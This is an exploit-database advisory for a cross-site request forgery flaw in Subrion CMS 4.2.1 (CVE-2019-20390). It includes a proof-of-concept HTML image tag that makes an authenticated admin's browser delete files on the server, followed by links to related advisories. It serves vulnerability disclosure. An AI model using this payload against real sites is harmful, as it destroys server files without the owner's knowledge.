Lucene search
Christian BortonePACKETSTORM:157700HistoryMay 14, 2020 - 12:00 a.m.
Subrion CMS 4.2.1 Cross Site Request Forgery
2020-05-1400:00:00
Christian Bortone
packetstormsecurity.com
155
EPSS
0.001
Percentile
45.9%
`# Title: Subrion CMS 4.2.1 Cross-Site Request Forgery vulnerability (CSRF)
# Date: 01-12-2019
# Author: Christian Bortone
# Contact: [email protected]
# Vendor Homepage: https://subrion.org/
# Vulnerable Product: Subrion CMS 4.2.1
# CVE : CVE-2019-20390
1. Description:
A Cross-Site Request Forgery (CSRF) vulnerability is discovered in Subrion CMS 4.2.1 which allows a remote attacker to remove files on the server without victim's knowledge by enticing authenticated user to visit attacker page/URL. The application failed to validate CSRF token on the GET request. An attacker can craft an URL (removing the token) and send to the victim.
2. Proof of Concept
<!-- Cancel file test.txt (l1_ci90ZXN0LnR4dA) from directory rm. -->
<html>
<img src="http://localhost/subrion/panel/uploads/read.json?cmd=rm&targets[]=l1_ci90ZXN0LnR4dA" />
</html>
`
Related
veracode
veracode
Cross-site Request Forgery (CSRF)
2020-05-18 08:23:33
nvd
nvd
CVE-2019-20390
2020-05-15 18:15:13
prion
prion
Cross site request forgery (csrf)
2020-05-15 18:15:00
osv
osv
CVE-2019-20390
2020-05-15 18:15:13
Subrion CMS Cross-Site Request Forgery (CSRF) vulnerability
2022-05-24 17:17:57
github
github
Subrion CMS Cross-Site Request Forgery (CSRF) vulnerability
2022-05-24 17:17:57
cvelist
cvelist
CVE-2019-20390
2020-05-15 17:07:56
cve
cve
CVE-2019-20390
2020-05-15 18:15:13